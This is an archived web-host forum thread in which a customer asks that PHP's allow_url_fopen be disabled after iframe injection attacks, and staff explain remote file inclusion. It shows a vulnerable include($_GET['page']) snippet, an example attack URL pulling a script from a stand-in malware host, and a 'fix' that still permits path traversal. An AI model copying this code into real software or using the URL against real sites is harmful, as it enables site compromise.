The "Freeola Customer Forum" forum, which includes Retro Game Reviews, has been archived and is now read-only. You cannot post here or create a new thread or review on this forum.
Is it possible to disable this on my webspace (I see it is currently 'on')?
Neil
N.
I must stress that the idea of this being a security risk is down to the programmer using functions relying on this not validating content properly and not due to the feature being enabled.
If you understand PHP here is a simple example:
On a page somewhere:
<?php
.....
....
include($_GET['page']);
...
...
?>
This allows someone to include other remote content by dong something similar to this:
http://www.yoursite.com/index.php?page=http://dodgymalwaresite.com?dodgyscript.php?inject
A simple fix would be to move your content pages to their own folder and then modify the code to this:
<?php
.....
....
include('page_dir/'.$_GET['page']);
...
...
?>
Try the .htaccess rules you asked support about and that may clear up you problems although we can't really help if the rewrite rules cause problems.
Any progress on disabling this yet?
N.
I do hope you can invoke some kind of disabling of this. I believe it would greatly help.
I look forward to hearing any progress.
N.
> Many thanks.
>
> ...would the 'custom' site level php.ini not work if I included
> it in my site root - to save others' inconvenience?
>
> N.
We don't allow customers to overide PHP directives via their own php.ini files as this could allow customers who changed options to not just compromise their own webspaces but other customers on the same server. However it is probably possible to add a control panel option to allow certain safe options to be overidden on the same basis as the enable global vars option (another option which can allow security risks).
...would the 'custom' site level php.ini not work if I included it in my site root - to save others' inconvenience?
N.
If you are seeing repeated injection attacks on your site then this suggests that you are accepting input that is not the sanitized. url_fopen is relatively safe if the people who write the code that makes use of it make sure they check any data it brings in. Not doing this is what causes problem and that is why it's generally considered a good idea to disable it.
I direct you to this article
http://tutorials.ausweb.com.au/web/Tutorials/PHP-and-MySql/Security-issues---allow_url_fopen/
I have and am still experiencing iframe code injection attacks on my entire webspace, and am getting sick of it.
I believe if allow_url_fopen was disabled it would help me immensely.
I have read that I can include
allow_url_fopen=off
in a site level php.ini but I have tried this and it appears not to make any difference to my webspace.
N.
Is it possible to disable this on my webspace (I see it is currently 'on')?
Neil